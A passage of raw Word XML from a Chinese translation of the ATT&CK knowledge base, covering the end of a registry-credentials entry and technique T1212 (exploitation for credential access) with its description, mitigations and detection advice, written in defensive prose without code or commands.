            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>存储在注册表中，请确保关联的账号只有有限的权限，防止它们</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>被攻击者</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取而滥用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0934121A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA713C9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAEE387" w14:textId="1F122CA8" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于查询注册表的应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），并收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那些</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示有</w:t>
      </w:r>
      <w:r>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正在搜索</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令参数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找出</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动与可能表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正在主动入侵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的关系</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而来减少</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>误报。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BA642" w14:textId="6100781F" w:rsidR="000F2665" w:rsidRPr="0096095B" w:rsidRDefault="006508E9" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>凭据访问</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="09021365" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C060154" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1212</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D6DB4B4" w14:textId="660EF391" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54BA3847" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070DE24C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AAF43AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r>
              <w:t>日志，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>indows</w:t>
            </w:r>
            <w:r>
              <w:t>错误报告，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70C3CA97" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>John Lambert</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Microsoft Threat Intelligence Center</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223FEA09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FAEBF0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE3C90F" w14:textId="02E997A7" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:t>攻击指的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者利用程序、服务或操作系统软件或内核本身中的编程错误执行恶意代码。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和身份认证机制作为手段</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取有用</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或绕过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取系统访问权限。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MS14-068</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:t>erberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用域用户权限来伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:t>利用还可能导致权限升级，具体</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取决于目标进程或所获取的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A529E8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="002E0439" w14:paraId="65433279" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="09455A83" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002E0439" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E0439">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="44AE1407" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002E0439" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E0439">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="3491756A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DF4354E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId147" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>应用隔离和沙箱</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CADDA02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用沙箱来使得</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>攻击者很难</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用未发现或未修补的漏洞来实施攻击操作。也可通过其他类型的虚拟化和应用微分段来减轻某些类型漏洞攻击的影响。但在这些系统中仍可能存在其他漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>和缺陷攻击风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="2B7CDC80" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B52328F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId148" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>漏洞攻击防护</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B6A63A1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以使用安全应用程序，</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>例如</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows Defender</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>防护（</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WDEG</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和增强缓和体验工具包（</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），来</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击行为，</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>从而</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缓解某些攻击行为的</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>影响</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。也可</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>通过控制流完整性检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>识别和阻止软件攻击。</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>许多保护</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>措施</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>依赖于体系结构和目标应用二进制文件的兼容性</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，可能不适用于针对防御逃逸的软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="0F8479F3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7023D923" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId149" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>威胁情报程序</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A4E0E39" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开发一个强大的网络威胁情报能力，用来确定哪些类型和级别的威胁可能会针对特定组织实施软件攻击和零日漏洞攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="1A827EB7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68471F90" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId150" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>软件更新</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B92D1AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对内部企业端点和服务器通过补丁管理来定期更新软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B43F40C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F6215D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356ABEAF" w14:textId="237A5C5A" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件利用检测可能很困难，</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>具体取决于</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用的工具。软件攻击可能并不会总是成功，或者可能导致被攻击的进程变得不稳定或崩溃。</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>还要在系统上查</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>能表明</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>成功的行为，例如进程的异常行为</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>软件攻击获得的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>平时</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>不常使用或</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不常见</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>使用这些</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>就</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>检测到</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
